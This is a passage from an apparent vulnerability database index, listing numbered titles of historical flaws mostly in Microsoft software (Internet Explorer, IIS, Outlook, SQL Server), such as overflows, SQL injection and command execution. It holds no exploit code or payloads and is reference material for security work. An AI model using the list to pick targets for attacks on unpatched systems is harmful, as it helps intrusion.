Bypass [13927] Microsoft ASP.NET Request Validation Mechanism Bypass [13859] Windows NT FTP Server (WFTP) Pro Long CWD Command Remote Overflow [13857] Windows NT Drivers DbgPrint Function Debug Message Format String [13762] Microsoft 2000 Domain Controller Directory Service Restore Mode Blank Password [13761] Microsoft Exchange 2000 Malformed URL Request DoS [13760] Microsoft IIS Malformed URL Request DoS [13759] Microsoft IIS ISAPI .ASP Parser Script Tag LANGUAGE Argument Overflow [13634] Microsoft IIS Inetinfo.exe Malformed Long Mail File Name DoS [13621] Microsoft Outlook Web Access (OWA) owalogon.asp Redirection Account Enumeration [13608] Microsoft IE Drag-and-Drop Privilege Escalation [13607] Microsoft IE CDF Cross-Domain Code Execution [13606] Microsoft IE createControlRange() Function Heap Corruption [13605] Microsoft IE URL Decoding Zone Spoofing Code Execution [13604] Microsoft IE Drag-and-Drop File Injection [13594] Microsoft Office XP URL Overflow [13558] Microsoft IIS SSL Request Resource Exhaustion DoS [13510] Microsoft Index Server AllowedPaths Registry Key Index Path Disclosure [13507] Microsoft IIS showfile.asp FileSystemObject Arbitrary File Access [13483] Microsoft Site Server AdSamples SITE.CSC Information Disclosure [13482] Microsoft Network Monitor (Netmon) Protocol Parsing Remote Overflow [13479] Microsoft IIS for Far East Parsed Page Source Disclosure [13478] Microsoft MS01-014 / MS01-016 Patch Memory Leak DoS [13473] Microsoft IIS on FAT Partition Local ASP Source Disclosure [13472] Microsoft Services for Unix Telnet Service Memory Consumption DoS [13471] Microsoft Services for Unix NFS Service Memory Consumption DoS [13439] Microsoft IIS HTTP Request Malformed Content-Length Parsing Remote DoS [13436] Microsoft Exchange LDAP Filter Exceptional BER Encoding DoS [13433] Microsoft IIS WebDAV MKCOL Method Location Server Header Internal IP Disclosure [13432] Microsoft IIS WebDAV WRITE Location Server Header Internal IP Disclosure [13431] Microsoft IIS WebDAV Malformed PROPFIND Request Internal IP Disclosure [13430] Microsoft IIS aexp4.htr Password Policy Bypass [13429] Microsoft IIS aexp3.htr Password Policy Bypass [13428] Microsoft IIS aexp2b.htr Password Policy Bypass [13427] Microsoft IIS aexp2.htr Password Policy Bypass [13426] Microsoft IIS NTLM Authentication Request Parsing Remote Information Disclosure [13425] Microsoft .NET orderdetails.aspx OrderID Parameter Arbitrary Order Access [13418] Microsoft Virtual Machine Applet Tag Malformed CODEBASE Arbitrary File Access [13417] Microsoft Virtual Machine COM Object Arbitrary Code Execution [13412] Microsoft Virtual Machine user.dir Property Information Disclosure [13406] Microsoft BizTalk Server BizTalkHTTPReceive.dll ISAPI Overflow [13385] Microsoft IIS WebDAV Long PROPFIND/SEARCH Request DoS [13333] Mozilla Thunderbird Microsoft IE Default Javascript Handler [13325] Microsoft Network Monitor (Netmon) HTTP Protocol Parser Overflow [13258] Microsoft IE Excel File Address Bar Spoofing [13238] Microsoft PowerPoint Action Settings Allows Invocation of Default Browser [13133] Microsoft IE iframe Tag Malformed file Attribute DoS [13132] Microsoft IE %20 URL Spoofing [13040] Microsoft IE Javascript Load Local File Path Disclosure [12937] Microsoft Office Encrypted Document RC4 Implementation Weakness [12918] Microsoft IE Dynamic IFRAME Tag XP SP2 File Download Security Bypass [12862] Microsoft IE USER32.CharLowerA Exception DoS [12806] Microsoft DATA Access IPS DAV Component Remote Arbitrary Content Write [12709] Microsoft HTML Parser Malformed Javascript DoS [12698] Microsoft IE FTP Download Traversal Arbitrary Command Execution [12660] Microsoft IE with RealOne pnxr3260.dll Embed Tag Arbitrary Code Execution [12654] Windows NT getCanonicalPath Memory Corropuption DoS [12652] Microsoft Visual Basic for Applications (VBA) VBE.DLL and VBE6.DLL Long ID Overflow [12612] NetCat for Windows -e Option Overflow [12424] Microsoft IE DHTML Edit ActiveX Control execScript() XSS [12408] Cisco Unity With Microsoft Exchange Multiple Default Accounts [12375] Microsoft Word / Wordpad Font Converter Remote Overflow [12373] Microsoft Word / Wordpad Tables Converter Remote Overflow [12354] Symantec Windows LiveUpdate NetDetect Local Privilege Escalation [12342] Microsoft IE BASE/FORM Address Bar Spoofing [12313] Microsoft IE Cross-domain Browser Window Injection Content Spoofing [12300] Microsoft SharePoint Portal Server STSADM.log- Log Local User Credential Disclosure [12299] Microsoft IE FTP URL Arbitrary Command Injection [12277] Microsoft IE sysimage: Local File Existence Disclosure [12258] Microsoft W3Who ISAPI (w3who.dll) Query String Remote Overflow [12257] Microsoft W3Who ISAPI (w3who.dll) Error Message XSS [12256] Microsoft W3Who ISAPI (w3who.dll) HTTP Connection Header XSS [12206] Apple Safari Spoof Pop-Up Windows [12163] Microsoft IE Save Picture As File Extension Spoofing [12157] Windows Application GUI Masked Password Disclosure [11958] Microsoft Outlook 2003 Image Rendering Security Policy Bypass [11957] Microsoft Outlook Express Troubleshooting Feature SMTP Auth Credential Disclosure [11956] Microsoft Outlook/Express Message body NUL Character DoS [11955] Microsoft IE/Outlook URL FORM Status Bar Spoofing [11954] Microsoft Outlook Express .dbx Deleted E-mail Persistence [11953] Microsoft Outlook Express A HREF Link Overflow DoS [11952] Microsoft Outlook Express S/MIME CA Certificate Spoofing [11951] Microsoft IE/Outlook XML File Attachment Arbitrary Script Execution [11950] Microsoft Outlook Express MIME Header Manipulation File Extension Spoofing Weakness [11949] Microsoft IE/Outlook BGSOUND Tag Information Disclosure [11948] Microsoft IE/Outlook Express IFRAME Tag Parsing Remote DoS [11947] Microsoft IE/Outlook BGSOUND Tag Parsing Remote DoS [11946] Microsoft IE/Outlook Malformed XBM File DoS [11945] Microsoft Outlook 2002 IFRAME Tag Embedded URL [11944] Microsoft Outlook 2002 HREF Tag Embedded JavaScript Execution [11943] Microsoft Outlook Image Tag Cookie Setting Bypass [11942] Microsoft Outlook Express Email Forward Blocked Attachment Access [11941] Microsoft Outlook Express HTML Frame base64 Attachment Security Bypass [11940] Microsoft Outlook Blocked Attachment Access [11939] Microsoft Outlook Attachment Spoofed Content Type [11938] Microsoft Outlook Express Attachment Filename Overflow [11937] Microsoft Outlook 98 Hidden Drive Access [11935] Microsoft Multiple Mail Client Read/Delivery Receipt Tag DoS [11918] Microsoft IE execCommand() File Extension Spoofing [11914] Microsoft Virtual Machine JDBC API Remote Security Check Bypass [11912] Microsoft Virtual Machine JDBC Java Applet Arbitrary DLL Load [11878] Microsoft IE Crafted Path Arbitrary Cookie Overwrite [11742] Microsoft IE Multiple Slash Disabled Protocol/Resource Restriction Bypass [11712] Microsoft ISA Server 2000 H.323 Filter Overflow [11580] Microsoft IE res: URI Handler File Existence Disclosure [11492] Solaris OpenWindows sdtcm_convert Overflow [11455] Microsoft IIS / PWS DOS Filename Request Access Bypass [11452] Microsoft IIS Double Byte Code Arbitrary Source Disclosure [11424] Microsoft Outlook V1 Exchange Server Security Certificate Cleartext Transmission [11423] Microsoft Outlook Malformed Header DoS [11422] Microsoft Outlook Express S/MIME Parsing Routine Remote Overflow [11420] Microsoft Outlook WMP .wms File IFRAME Command Execution [11419] Microsoft Outlook Express Header Carriage Return Filter Bypass [11418] Microsoft Outlook Express text/plain MIME Content Embedded SCRIPT Tag Command Execution [11417] Microsoft Outlook/Express VCard Handler Remote Overflow [11416] Microsoft Outlook/Express Blank Header DoS [11415] Microsoft Outlook Express Forced POP3 Command Mode DoS [11409] Windows NT RRAS/RAS Client Persistent Password Caching [11395] F-Secure Anti-Virus for Microsoft Exchange Nested Password Protected Archives Bypass [11337] Microsoft IE FRAME/IFRAME/EMBED Tag Overflow [11277] Microsoft IIS SSL ISAPI Filter Cleartext Information Disclosure [11274] Microsoft IE &quot [11268] Microsoft Exchange Internet Mail Service AUTH/AUTHINFO Command DoS [11257] Microsoft IIS Malformed GET Request DoS [11222] Microsoft XP SP2 Authenticated User Remote Shutdown [11170] Microsoft IE iframe Malformed base href DoS [11157] Microsoft IIS FTP Service PASV Connection Saturation DoS [11152] Microsoft IE Malformed HTML Style DoS [11138] Microsoft IE HTML Rendering mshtml.dll NULL Pointer Dereference DoS [11101] Microsoft IIS Multiple Slash ASP Page Request DoS [11097] Windows NT SP2 Passfilt.dll Password Complexity Weakness [11088] Multiple VAX DECwindows Motif Server Local Privilege Escalation [11068] Windows NT Win32k.sys Incorrect Parameter Local DoS [11067] Windows NT NonPagedPool Lock Saturation DoS [11063] Microsoft Site Server Direct Mailer TMLBQueue Share Information Disclosure [11051] Microsoft Outlook cid: MIME Mishandling Forced Image Rendering [11018] Microsoft SNA Server AS/400 Local APPC LU Shared Folder Disclosure [11017] OpenVMS DECwindows/MOTIF User Account Lockout Weakness [11010] Windows 2003 Multiple DACL Insecure Permissions [10998] Microsoft Access Snapshot Viewer ActiveX Control Arbitrary Command Execution [10996] Microsoft File Transfer Manager ActiveX Control Arbitrary Command Execution [10995] Microsoft File Transfer Manager ActiveX Control Arbitrary File Upload/Download [10994] Microsoft DirectX Files Viewer ActiveX Control xweb.ocx Overflow [10992] Microsoft IE Embedded HTML Help Control Cross Zone Scripting [10991] Microsoft IE HTML Help Drag and Drop Arbitrary Code Injection [10977] Microsoft Eyedog ActiveX Server Side Redirect Arbitrary Command Execution [10969] HP Tru64 X Windows Unspecified Local Overflow [10968] HP Tru64 UNIX X Windows Unspecified File Permission Weakness [10967] Microsoft IE Javascript User Homepage Address Spoofing [10935] Microsoft Word Macro Security Model Bypass [10895] Microsoft FrontPage asycpict.dll JPEG Processing DoS [10756] Microsoft MSN heartbeat.ocx Component Overflow [10736] Microsoft Excel SYLK Macro Arbitrary Command Execution [10735] Microsoft Excel Virus Warning Mechanism Bypass [10734] Microsoft Word/Excel Shared Document INCLUDEPICTURE Field Arbitrary File Read [10733] Microsoft Word/Excel Shared Document INCLUDETEXT Field Arbitrary File Read [10714] Microsoft cabarc Traversal Arbitrary File Overwrite [10709] Microsoft IE SSL Cached Content Spoofing [10708] Microsoft IE Image Tag Arbitrary Script Execution (HijackClick 3) [10707] Microsoft IE Plug-in Navigation Address Bar Spoofing [10706] Microsoft IE Double Byte Character Set Address Bar Spoofing [10705] Microsoft IE Install Engine Inseng.dll Arbitrary Code Execution [10704] Microsoft IE Similar Method Name Redirection Cross Domain/Site Scripting [10694] Microsoft Excel XLS File Local Overflow (MS04-033) [10670] Microsoft ASP.NET Forms .aspx File Authentication Bypass [10561] Apple QuickTime Player for Windows URL Handling Overflow [10557] Microsoft ASP.NET Canonicalization Authentication Bypass [10550] Microsoft IE Redirect Script Arbitrary XML Document Access [10549] Microsoft Word .doc Parsing Exception Arbitrary Command Execution [10379] Microsoft SQL Server Large Query DoS [10358] Microsoft Outlook Client Persistent X-UIDL Header DoS [10246] Microsoft Exchange Server Malformed NNTP AUTHINFO DoS [10183] Microsoft SQL Server xp_sprintf Function DoS [10181] Microsoft SQL Server formatmessage Function DoS [10166] Microsoft SQL Server raiserror Function DoS [10159] Microsoft SQL Server Multiple Extended Stored Procedure Overflows [10158] Microsoft SQL Server Password Encryption Procedure Overflow [10157] Microsoft SQL Server BULK INSERT Query Overflow [10156] Microsoft SQL Server SQLExecutiveCmdExec Account Credential Encryption Weakness [10155] Microsoft SQL Server Enterprise Manager Authentication Credential Encryption Weakness [10154] Microsoft SQL Server xp_SetSQLSecurity Function Overflow [10153] Microsoft SQL Server xp_proxiedmetadata Function Overflow [10152] Microsoft SQL Server xp_printstatements Function Overflow [10151] Microsoft SQL Server xp_peekqueue Function Remote Overflow [10150] Microsoft SQL Server xp_updatecolvbm Function Overflow [10149] Microsoft SQL Server xp_showcolv Function Remote Overflow [10148] Microsoft SQL Server xp_enumresultset Function Overflow [10147] Microsoft SQL Server xp_displayparamstmt Function Overflow [10146] Microsoft SQL Server xp_sprintf Function Overflow [10145] Microsoft SQL Server formatmessage Function Overflow [10144] Microsoft SQL Server raiserror Function Overflow [10143] Microsoft SQL Server OpenRowset OLE DB Provider Name Overflow [10142] Microsoft SQL Server OpenDataSource OLE DB Provider Name Overflow [10141] Microsoft SQL Server sestup.iss File Authentication Credential Disclosure [10140] Microsoft SQL Server Stored Procedure Arbitrary Command Execution [10139] Microsoft SQL Server Agent Arbitrary File Creation [10138] Microsoft SQL Server xp_displayparamstmt Procedure Privilege Escalation [10137] Microsoft SQL Server xp_printstatements Procedure Privilege Escalation [10136] Microsoft SQL Server xp_execresultset Procedure Privilege Escalation [10135] Microsoft SQL Server Malformed 0x08 Packet DoS [10133] Microsoft SQL Server sp_MScopyscript Procedure scriptfile Parameter Arbitrary Code Execution [10132] Microsoft SQL Server Authentication Function Remote Overflow [10131] Microsoft SQL Server DBCC SourceDB Argument Arbitrary Command Execution [10129] Microsoft Data Access Components SQL-DMO Broadcast Request Overflow [10127] Microsoft SQL Server xp_runwebtask Procedure Privilege Escalation [10126] Microsoft SQL Server CreateFile API Function Privilege Escalation [10125] Microsoft SQL Server Named Pipe Hijack Privilege Escalation [10123] Microsoft SQL Server LPC Packet Handling Local Overflow [10104] Microsoft BizTalk Server DTA RawCustomSearchField.asp SQL Injection [10103] Microsoft BizTalk Server DTA rawdocdata.asp SQL Injection [10050] IBM OEM Windows XP Home Default Hidden Administrator Account [10006] Microsoft WordPerfect Converter Corel File Multiple Parameter Remote Overflow [9951] Microsoft Multiple Products GDIPlus.dll JPEG Processing Overflow [9896] Microsoft Netmeeting Remote Desktop Sharing Remote Session Hijack [9895] Microsoft NetMeeting Arbitrary Clipboard Content Disclosure [9818] F-Secure Anti-Virus For Microsoft Exchange Content Scanner Server Exception Handling DoS [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing [9671] Microsoft IE onUnload Address Bar Spoofing [9591] Windows Kernel Error Message Debugging Local Overflow [9560] HP Systems Insight Manager Microsoft Security Patch Login DoS [9543] Jetty CGI+windows Unspecified Security Issue [9315] Microsoft IIS getdrvs.exe ODBC Sample Information Disclosure [9314] Microsoft IIS mkilog.exe ODBC Sample Arbitrary Command Execution [9207] Microsoft Content Management ManualLogin.asp REASONTXT Parameter XSS [9200] Microsoft IIS Unspecified XSS Variant [9199] Microsoft IIS shtml.dll XSS [9189] Microsoft ASP.Net Null Character XSS Protection Bypass [9172] Microsoft IE File/Directory Existence Disclosure [9167] Microsoft Outlook Express BCC: Recipient Information Disclosure [9070] Microsoft IE dragDrop Arbitrary File Upload (What a Drag II) [8978] Microsoft IE Address Bar Spoofing (NullyFake) [8941] Microsoft IE Merlin.speak Function CPU DoS [8428] Microsoft NetMeeting Malformed Packets DoS [8414] Microsoft IE mms: Protocol Handler Arbitrary Command [8372] thttpd for Windows Encoded Traversal Arbitrary File Access [8335] Microsoft IE mshtml.dll Null Pointer DoS [8309] Mozilla Browsers For Windows XPInstall Security Dialog Arbitrary Extension Installation [8277] Microsoft IE Malformed GIF Double-free DoS [8276] Microsoft IE Malformed BMP Overflow [8275] Microsoft IE Navigation Cross Domain Execution (InsiderPrototype) [8243] Microsoft SMS Port 2702 DoS [8224] Microsoft IE CSS Memory Corruption DoS [8211] Microsoft Exchange Server Malformed SMTP Command DoS [8210] Microsoft HTML Control Large Form Field DoS [8148] Microsoft IE Arbitrary File Write (What a Drag) [8129] Microsoft IE CSS Malformed div element DoS [8098] Microsoft IIS Virtual Directory ASP Source Disclosure [8053] Microsoft Virtual Machine Illegal Cast Operation Command Execution [8052] Microsoft ActiveX Control Arbitrary Cabinet File Execution [7963] Microsoft IE parent.window.open location.cache Script Execution [7951] Microsoft SMS Remote Control Client DoS [7916] Microsoft IE Multimedia Page XSS (viaSWFurl) [7915] Microsoft IE ADODB.Stream Media Arbitrary File Execution [7914] Microsoft IE .FOLDER File Type Execution [7913] Microsoft IE Shell.Application ActiveX Arbitrary Command Execution [7912] Microsoft IE showHelp() Arbitrary File Execution [7910] Microsoft IE Double Slash Cache File Execution (DblSlashForCache) [7909] Microsoft IE Cache Location Information Disclosure (execdror6) [7907] Microsoft IE FileSystemObject ActiveX Object Arbitrary Command Execution [7906] Microsoft IE WebBrowser ActiveX Object Clipboard Content Disclosure [7905] Microsoft IE ie5setup.exe Multple Service Disable [7903] Microsoft IE external.NavigateAndFind Arbitrary File Access [7902] Microsoft IE / Outlook Express Active Scripting Arbitrary E-mail Message Access [7901] Microsoft IE Active Setup ActiveX Component Arbitrary Software Installation [7900] Microsoft IE WebBrowser Control NavigateComplete2 Policy Bypass [7899] Microsoft IE with ActivePython ActiveX Control Arbitrary File Read [7898] Microsoft IE with Google Toolbar Malicious HTML DoS [7897] Microsoft IE Crafted Filename Arbitrary Visual FoxPro Application Execution [7896] Microsoft IE Java Implementation Malformed Domain Portion Arbitrary Script Execution [7895] Microsoft IE MS-DOS Device Name URL DoS [7894] Microsoft IE Object Tag Type Property Double-byte Overflow [7893] Microsoft IE window.open file: Security Bypass (WsOpenFileJPU) [7892] Microsoft IE href Javascript Arbitrary Command Execution (BodyRefreshLoadsJPU) [7890] Microsoft IE Download Function Cache Disclosure (threadid10008) [7889] Microsoft IE createTextRange Security Bypass (LinKiller) [7888] Microsoft IE createRange FIND Dialog Security Bypass (Findeath) [7887] Microsoft IE XML Data Binding Object Tag Arbitrary Command Execution [7886] Microsoft Java Virtual Machine StandardSecurityManager Restriction Bypass [7885] Microsoft Java Implementation Applet Tag DoS [7884] Microsoft Java Virtual Machine Passed HTML Object DoS [7883] Microsoft Java Implementation CabCracker Class Security Bypass [7882] Microsoft Java Applet Codebase Tag Arbitrary File Read [7881] Microsoft Java Implementation INativeServices Clipboard Content Disclosure [7880] Microsoft Java INativeServices Arbitrary Memory Information Disclosure [7879] Microsoft Java getAbsolutePath Current Directory Disclosure [7878] Microsoft Java Virtual Machine ClassLoader.loadClass Overflow [7877] Microsoft Java Virtual Machine Class.forName Overflow [7876] Microsoft IE .isp File Arbitrary Command Execution [7874] Microsoft IE Cross-domain Sub-frame Navigation Content Spoofing [7872] Microsoft IE ActiveX Object Code Arbitrary Command Execution (Qhosts) [7866] Microsoft IE Frame Spoofing Content Injection [7864] Microsoft IE URL History FTP Credential Disclosure [7863] Microsoft IE OBJECT Tag Long CLASSID DoS [7862] Microsoft IE User DAT File History Disclosure [7861] Microsoft IE Standard Cache Control Authentication Credential Leak [7860] Microsoft IE Java JSObject Cross Frame Security Policy Bypass [7859] Microsoft IE Frame Domain Verification Arbitrary File Access [7858] Microsoft IE CLSID Alteration Arbitrary Command Execution [7857] Microsoft IE Script Tag SRC Value Arbitrary File Access [7856] Microsoft IE Q312461 Patch HTTP_USER_AGENT Information Disclosure [7854] Microsoft IE Chinese Character Scrolling DoS [7853] Microsoft IE window.createPopup Chromeless Window Spoofing [7852] Microsoft IE showModelessDialog Infinite Loop DoS [7851] Microsoft IE Multiple Form Field DoS [7850] Microsoft IE Malformed Content Header Arbitrary Command Execution [7849] Microsoft IE Javascript location.replace Recursive DoS [7848] Microsoft IE userData storeuserData Cookie Privacy Setting Bypass [7847] Microsoft IE JVM System.out.println Logging Arbitrary Command Execution [7846] Microsoft IE PNG Invalid Length Code DoS [7845] Microsoft IE Encoded URL Information Disclosure [7844] Microsoft IE Object Tag Temporary File Information Disclosure [7843] Microsoft IE URLMON.DLL Multiple Overflows [7842] Microsoft IE File Upload Control Arbitrary File Access [7841] Microsoft IE Scriptlet Component Arbitrary File Access [7840] Microsoft IE Javascript Applet Data Redirect Arbitrary File Access [7839] Microsoft IE Malformed Favorite Icon Arbitrary Command Execution [7838] Microsoft IE File Upload Control Paste Arbitrary File Read [7837] Microsoft IE Cross Frame Security Arbitrary File Access [7836] Microsoft IE EMBED Tag Overflow [7835] Microsoft IE IFRAME Document.ExecCommand Restriction Bypass Arbitrary File Access [7834] Microsoft IE Preloader Legacy ActiveX Arbitrary File Access [7833] Microsoft IE/OE res: Protocol Library Overflow [7832] Microsoft IE Client Window Reference Server Side Arbitrary File Access [7831] Microsoft IE Virtual Machine Java Applet Sandbox Bypass [7830] Microsoft IE mk: URL Handling Remote Overflow [7829] Microsoft IE JScript Engine Window.External Function Arbitrary Command Execution [7828] Microsoft IE Dotless IP Address Zone Privilege Escalation [7827] Microsoft IE Cross Security Domain Arbitrary File Access [7826] Microsoft IE SSL Certificate Validation Failure (v2) [7825] Microsoft IE Domain Frame Arbitrary File Access [7824] Microsoft IE Virtual Machine Unsigned Applet Arbitrary Command Execution [7823] Microsoft IE Cached Content .chm Arbitrary Program Execution [7822] Microsoft IE HTML Form Input Element Arbitrary File Access [7821] Microsoft IE Print Templates Feature Arbitrary ActiveX Execution [7820] Microsoft IE Scriptlet Invoking ActiveX Arbitrary File Access [7819] Microsoft IE Small IFRAME DHTML Arbitrary File Access [7818] Microsoft IE Page Redirect Authentication Credential Leak [7817] Microsoft IE Frame Domain Validation Arbitrary File Access [7816] Microsoft IE SFU Telnet Client Arbitrary Command Execution [7807] Microsoft IIS ISAPI Virtual Directory UNC Mapping ASP Source Disclosure [7806] Microsoft IE HTML E-mail Feature Unusual MIME Type Command Execution [7802] Microsoft IE File Download Extension Spoofing [7801] Microsoft IE Javascript window.open Null-Pointer DoS [7793] Microsoft Outlook Express Header Validation DoS [7779] Microsoft IE AnchorClick Cross Zone Scripting [7778] Microsoft Outlook Window Opener Script Execution [7776] Microsoft IE Download Window Filename Filetype Spoofing [7775] Microsoft IE Channel Link Script Injection [7774] Microsoft IE Popup.show() Click Hijack (HijackClick 3) [7769] Microsoft Outlook With Word Editor Object Tag Code Execution [7762] Microsoft Java Virtual Machine Cross-Site Communication [7746] Windows NT FTP Server (WFTP) CD Command Arbitrary File Access [7739] Microsoft IE plugin.ocx Load() Method Overflow [7737] Microsoft IIS ASP Redirection Function XSS [7608] Microsoft Index Server Internet Data Query Path Disclosure [7607] Microsoft IE CSS Unterminated Comment Handling Memory Corruption [7595] Mozilla Browsers for Windows shell: URI Arbitrary Command Execution [7405] Microsoft Phone Dialer (dialer.exe) Dialer Entry Overflow [7296] Microsoft IE Cross-domain Frame Injection Content Spoofing [7293] Microsoft Plus! Compressed Folder Password Disclosure [7265] Microsoft IIS .ASP Session ID Disclosure and Hijacking [7202] Microsoft PowerPoint 2000 File Loader Overflow [7187] Microsoft MN-500 Web Administration Multiple Connections DoS [7168] Microsoft Data Access Component Internet Publishing Provider WebDAV Security Zone Bypass [7096] Microsoft Outlook Express Mac OS Auto HTML Download [7055] Microsoft Outlook Express for Mac OS E-mail Long Line DoS [6971] Microsoft ISA Server 2000 ICMP Rule Bypass During Startup [6970] Microsoft ISA Server 2000 Web Publishing Unencrypted Credentials Disclosure [6969] Microsoft ISA Server 2000 Invalid DNS Request DoS [6968] Microsoft ISA Server 2000 FTP Port Scan Bounce Weakness [6967] Microsoft ISA Server 2000 UDP Packet Winsock DoS [6965] Microsoft ISA Server 2000 SSL Packet DoS [6964] Microsoft ISA Server 2000 DNS Intrusion Detection Filter DoS [6963] Microsoft IE showModalDialog Method Arbitrary Code Execution [6931] Microsoft IE/Outlook Double Null Character DoS [6749] Microsoft Crystal Reports Web Viewer crystalimagehandler.aspxArbitrary File Access [6742] Microsoft DirectPlay Packet Validation DoS [6674] Microsoft Office 98 for Macintosh Disk Space Information Disclosure [6672] Microsoft SharePoint with MSIE settings.htm Authentication Bypass [6538] Microsoft IE/Outlook ImageMap URL Spoofing [6272] Microsoft IE MIME Content-Type Header Processing Weakness Cross-content XSS [6257] Symantec Norton Anti-Virus CE Windows XP Floppy Scan Bypass [6217] Microsoft Outlook RTF Embedded Object Security Bypass [6121] Microsoft Outlook Express BASE HREF Web Content Loading [6080] Microsoft IE MSHTML.DLL Cross-Frame Script Execution [6079] Microsoft Outlook Remote XML Loading [6031] Microsoft Exchange Multiple SMTP Command DoS [6007] Microsoft IE/Outlook IMG/HREF Tag Code Execution [5998] Microsoft Outlook Predictable File Caching [5993] Microsoft Active Server Pages (ASP) Engine Malformed Cookie Handling Remote Information Disclosure [5965] Microsoft IE MSHTML.DLL IMG SRC Tag Information Disclosure [5936] Microsoft SMTP Service 4xx Error Code DoS [5887] Microsoft Access 97 Cleartext Password Storage [5884] Microsoft Site Server ASP Upload Remote Command Execution [5869] Microsoft IE MSHTML.DLL Javascript %01 URL Arbitrary File Access [5856] X Windows (X11) Magic Cookie Prediction Command Execution [5855] Microsoft Exchange MTA HELO Command Remote Overflow [5851] Microsoft IIS Single Dot Source Code Disclosure [5833] Windows NT FTP Server (WFTP) Unprintable Character Overflow [5829] Windows NT FTP Server (WFTP) Error Message Server Path Disclosure [5736] Microsoft IIS Relative Path System Privilege Escalation [5694] Microsoft IE Address Bar URL Spoofing [5693] Microsoft MS00-060 Patch IIS Malformed Request DoS [5633] Microsoft IIS Invalid WebDAV Request DoS [5608] Microsoft NetMeeting Malformed String DoS [5606] Microsoft IIS WebDAV PROPFIND Request DoS [5600] Oracle Database on Windows NT Net8 Listener Thread Exhaustion Remote DoS [5584] Microsoft IIS URL Redirection Malformed Length DoS [5581] Trend Micro ScanMail for Microsoft Exchange Administrative Credential Disclosure [5566] Microsoft IIS Form_VBScript.asp XSS [5563] Microsoft IE Telnet Client SFU Arbitrary Command Execution [5557] Microsoft Outlook Web Access With IE Embedded Script Execution [5556] Microsoft IE Dotless IP Intranet Zone Spoofing [5419] Microsoft IE mshtml.dll EMBED Directive Overflow [5390] Microsoft Exchange NTLM Null Session Mail Relay [5357] Microsoft Multiple Products for Mac File URL Overflow [5356] Microsoft IE for Mac Local AppleScript Invocation [5355] Microsoft MSN Chat ActiveX ResDLL Parameter Overflow [5347] Microsoft SQL Server SQLXML ISAPI Extension Remote Overflow [5343] Microsoft SQL Server SQLXML root Parameter XSS [5342] Microsoft IE Malformed Web Page Zone Spoofing [5316] Microsoft IIS ISAPI HTR Chunked Encoding Overflow [5242] Microsoft IE/Outlook MHTML .chm ITS Protocol Handler Code Execution [5241] Microsoft Jet Database Engine Remote Code Execution [5175] Microsoft Excel Hyperlinked Workbook Arbitrary Code Execution [5174] Microsoft Excel Inline Macro Arbitrary Code Execution [5173] Microsoft Excel Embedded XSL Stylesheet Arbitrary Code Execution [5172] Microsoft Commerce Server OWC Installer LocalSystem Arbitrary Code Execution [5171] Microsoft Word 2002 Mail Merge Tool Execute Arbitrary Script [5170] Microsoft Commerce Server OWC Installer Arbitrary Command Execution [5163] Microsoft Commerce Server AuthFilter ISAPI Filter Overflow [5162] Microsoft IE Legacy Data-island Capability Read Arbitrary XML File [5152] Microsoft Legacy Text Formatting ActiveX Control Overflow [5134] Microsoft IE Reference Local HTML Resource Script Execution [5133] Microsoft Metadirectory Services LDAP Client Authentication Bypass [5129] Microsoft IE Download File Origin Spoofing [5126] Microsoft BackOffice Authentication Bypass [5124] Microsoft TSAC ActiveX Long Server Name Overflow [5064] Microsoft SQL Server Jet Engine OpenDataSource Function Overflow [4968] Microsoft SharePoint Portal Server Multiple Unspecified XSS [4951] Microsoft IE CLASSID Remote DoS [4932] Microsoft Outlook Web Access SecurID Authentication Bypass [4915] Microsoft Content Management Server (MCMS) Web Authoring Command File Upload Arbitrary Code Execution [4914] Microsoft Content Management Server (MCMS) Resource Request SQL Injection [4864] Microsoft IIS TRACK Logging Failure [4863] Microsoft IIS Active Server Page Header DoS [4862] Microsoft Content Management Server (MCMS) Unspecified Authentication Function Overflow [4791] Microsoft IIS Response Object DoS [4779] Microsoft Desktop Engine (MSDE) 2000 Stored Procedure SQL Injection [4778] Microsoft SQL Server 2000 Stored Procedure SQL Injection [4777] Microsoft Desktop Engine (MSDE) 2000 Database Consistency Checkers (DBCCs) Overflow [4776] Microsoft SQL Server 2000 Database Consistency Checkers (DBCCs) 2000 Overflow [4734] InoculateIT Microsoft Exchange Inbox Folder Tree Moved Message Scanning Bypass [4655] Microsoft IIS ssinc.dll Long Filename Overflow [4627] Microsoft IE Text Control Overflow [4626] Microsoft DirectX Files Viewer xweb.ocx Overflow [4578] Microsoft SQL Resolution Service Monitor Thread Registry Key Name Overflow [4577] Microsoft SQL Resolution Service 0x08 Byte Long String Overflow [4535] Microsoft Media Services ISAPI nsiislog.dll POST Overflow [4513] Microsoft Visual C++ Constructed ISAPI Extensions [4337] Windows NT FTP Server (WFTP) Pro Server Administrative GUI DoS [4186] Microsoft IE Cookie Path Traversal [4168] Microsoft Outlook 2002 mailto URI Script Injection [4116] Windows NT FTP Server (WFTP) Xerox Docutech DoS [4115] Windows NT FTP Server (WFTP) Server CPU Utilization DoS [4114] Windows NT FTP Server (WFTP) Server STAT/LIST Command DoS [4078] Microsoft IE Cross Frame Scripting Restriction Bypass [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure [3968] Microsoft FrontPage Personal Web Server Arbitrary File Access [3893] Microsoft Virtual PC for Mac Insecure Temporary Files Creation [3879] Microsoft IE File Identification Variant [3791] Microsoft IE Travel Log Arbitrary Script Execution [3738] Microsoft IE Content-disposition Header File Download Extension Spoofing [3512] Microsoft IIS ODBC Tool getdrvrs.exe Remote DSN Creation [3501] Microsoft FrontPage form_results Information Disclosure [3500] Microsoft IIS fpcount.exe Remote Overflow [3490] Microsoft Exchange 2003 OWA Mailbox Access Information Disclosure [3457] Microsoft MDAC Broadcast Reply Overflow [3446] HD Soft Windows Ftp Server wscanf Function Format String [3386] Microsoft FrontPage Server Extensions htimage.exe File Existence Enumeration [3385] Microsoft FrontPage Server Extensions htimage.exe Remote Path Disclosure [3384] Microsoft FrontPage htimage.exe Overflow [3383] Microsoft FrontPage Server Extensions imagemap.exe File Verification [3382] Microsoft FrontPage Server Extensions imagemap.exe Remote Path Disclosure [3381] Microsoft FrontPage imagemap.exe Overflow [3341] Microsoft IIS Redirect Response XSS [3339] Microsoft IIS HTTP Error Page XSS [3338] Microsoft IIS Help File XSS [3328] Microsoft IIS FTP Status Request DoS [3326] Microsoft IIS w3svc.dll ISAPI Filter URL Handling Remote 